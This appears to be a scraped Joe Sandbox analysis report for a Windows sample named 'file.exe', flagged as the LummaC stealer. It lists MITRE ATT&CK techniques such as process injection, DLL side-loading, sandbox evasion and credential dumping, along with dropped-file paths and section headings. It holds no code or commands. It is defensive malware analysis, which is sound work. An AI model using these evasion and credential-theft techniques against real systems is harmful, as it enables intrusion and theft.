Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_f93284ae77ab4eed7e1e6983ffdeb6b8c8d517_2059615a_dc763f9f-12e3-4a02-b6ca-49570e84e160\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4C58.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4D53.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4DA2.tmp.xml

C:\Users\user\AppData\Roaming\gdi32.dll

C:\Windows\appcompat\Programs\Amcache.hve

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Windows Analysis Report
file.exe

Function 6CD92E60 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 407
COMMON

Function 6CD96CC8 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Function 6CD96D78 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Function 6CD96BC1 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Function 6CD9B9ED Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Function 6CD9C250 Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Function 6CD99FB6 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE